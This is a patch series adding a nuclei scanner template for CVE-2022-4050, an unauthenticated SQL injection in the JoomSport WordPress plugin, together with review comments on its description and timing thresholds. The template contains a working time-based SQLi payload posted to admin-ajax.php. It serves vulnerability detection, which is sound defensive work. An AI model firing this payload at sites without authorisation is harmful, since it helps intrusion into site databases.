From f6c9291b83d7adb772a3fe8528ba60b3df89a21d Mon Sep 17 00:00:00 2001
From: Aman Rawat
Date: Tue, 13 Dec 2022 19:52:56 +0530
Subject: [PATCH 1/3] Added template for CVE-2022-4050
---
 cves/2022/CVE-2022-4050.yaml | 39 ++++++++++++++++++++++++++++++++++++
 1 file changed, 39 insertions(+)
 create mode 100644 cves/2022/CVE-2022-4050.yaml
diff --git a/cves/2022/CVE-2022-4050.yaml b/cves/2022/CVE-2022-4050.yaml
new file mode 100644
index 0000000000..a0ed1b9e47
--- /dev/null
+++ b/cves/2022/CVE-2022-4050.yaml
@@ -0,0 +1,39 @@
+id: CVE-2022-4050
+
+info:
+ name: JoomSport < 5.2.8 - Unauthenticated SQLi
+ author: theamanrawat
+ severity: critical
+ description: |
+ The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
+ reference:
+ - https://wpscan.com/vulnerability/5c96bb40-4c2d-4e91-8339-e0ddce25912f
+ - https://wordpress.org/plugins/joomsport-sports-league-results-management/
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-4050
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-4050
+ cwe-id: CWE-89
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,joomsport-sports-league-results-management,unauth
+
+requests:
+ - raw:
+ - |
+ @timeout: 10s
+ POST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(3))aaaa);--+-"}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code == 200'
+ - 'contains(content_type, "text/html")'
+ - 'contains(body, "jscaruselcont jsview2")'
+ condition: and
\ No newline at end of file
From a5fade36dd712daf9875ed40bdf43db95044ae32 Mon Sep 17 00:00:00 2001
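Review bot: The `description` block says only that "a parameter" is not sanitised, while the request in the same file shows exactly which input the template exercises (the `id` key inside the `shattr` form parameter of the `joomsport_md_load` admin-ajax action) and the `name` field gives the fixed version, so a reader of the info block alone cannot tell what is being tested. Suggested wording: `The JoomSport WordPress plugin before 5.2.8 does not properly sanitise and escape the id value of the shattr parameter of the joomsport_md_load admin-ajax action before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.` Keeping the description aligned with the request also makes it easier to judge whether a later change to the payload still matches what the template claims to cover.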
From: Dhiyaneshwaran
Date: Wed, 14 Dec 2022 10:43:47 +0530
Subject: [PATCH 2/3] Update CVE-2022-4050.yaml
---
 cves/2022/CVE-2022-4050.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/cves/2022/CVE-2022-4050.yaml b/cves/2022/CVE-2022-4050.yaml
index a0ed1b9e47..f18f0c41f9 100644
--- a/cves/2022/CVE-2022-4050.yaml
+++ b/cves/2022/CVE-2022-4050.yaml
@@ -32,8 +32,8 @@ requests:
 matchers:
 - type: dsl
 dsl:
- - 'duration>=6'
+ - 'duration>=3'
 - 'status_code == 200'
 - 'contains(content_type, "text/html")'
 - 'contains(body, "jscaruselcont jsview2")'
- condition: and
\ No newline at end of file
+ condition: and
From b96431c2ace073c4514e820a57a9e31fa1f31088 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 16 Dec 2022 07:38:03 +0530
Subject: [PATCH 3/3] Update CVE-2022-4050.yaml
---
 cves/2022/CVE-2022-4050.yaml | 13 +++++--------
 1 file changed, 5 insertions(+), 8 deletions(-)
diff --git a/cves/2022/CVE-2022-4050.yaml b/cves/2022/CVE-2022-4050.yaml
index f18f0c41f9..12ac0b3770 100644
--- a/cves/2022/CVE-2022-4050.yaml
+++ b/cves/2022/CVE-2022-4050.yaml
@@ -11,28 +11,25 @@ info:
 - https://wordpress.org/plugins/joomsport-sports-league-results-management/
 - https://nvd.nist.gov/vuln/detail/CVE-2022-4050
 classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
 cve-id: CVE-2022-4050
- cwe-id: CWE-89
 metadata:
- verified: "true"
- tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,joomsport-sports-league-results-management,unauth
+ verified: true
+ tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,joomsport-sports-league-results-management,unauth
 
 requests:
 - raw:
 - |
- @timeout: 10s
+ @timeout: 15s
 POST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1
 Host: {{Hostname}}
 Content-Type: application/x-www-form-urlencoded
 
- mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(3))aaaa);--+-"}
+ mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(4))aaaa);--+-"}
 
 matchers:
 - type: dsl
 dsl:
- - 'duration>=3'
+ - 'duration>=5'
 - 'status_code == 200'
 - 'contains(content_type, "text/html")'
 - 'contains(body, "jscaruselcont jsview2")'
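Review bot: The matcher threshold now exceeds the injected delay: the payload line changes to `SLEEP(4)` but the DSL line requires `duration>=5`, so if the statement is evaluated once per request, a vulnerable host with under a second of overhead measures as 4 (nuclei reports `duration` in whole seconds, as far as I know) and is reported clean. The original threshold of 6 for `SLEEP(3)` suggests the author observed the delay more than once per request; if that is the reason for the gap it should be recorded above the matcher, e.g. `# the injected SLEEP is observed more than once per request, hence the threshold above the sleep value`, otherwise `- 'duration>=4'` is the safer choice. Separately, dropping `cvss-metrics`, `cvss-score` and `cwe-id` leaves `classification` with only `cve-id`, while the NVD reference two lines above still points at a scored entry with CWE-89 in the first patch; if these were removed because the entry was not yet finalised, the commit message should say so, since other templates use these fields for filtering.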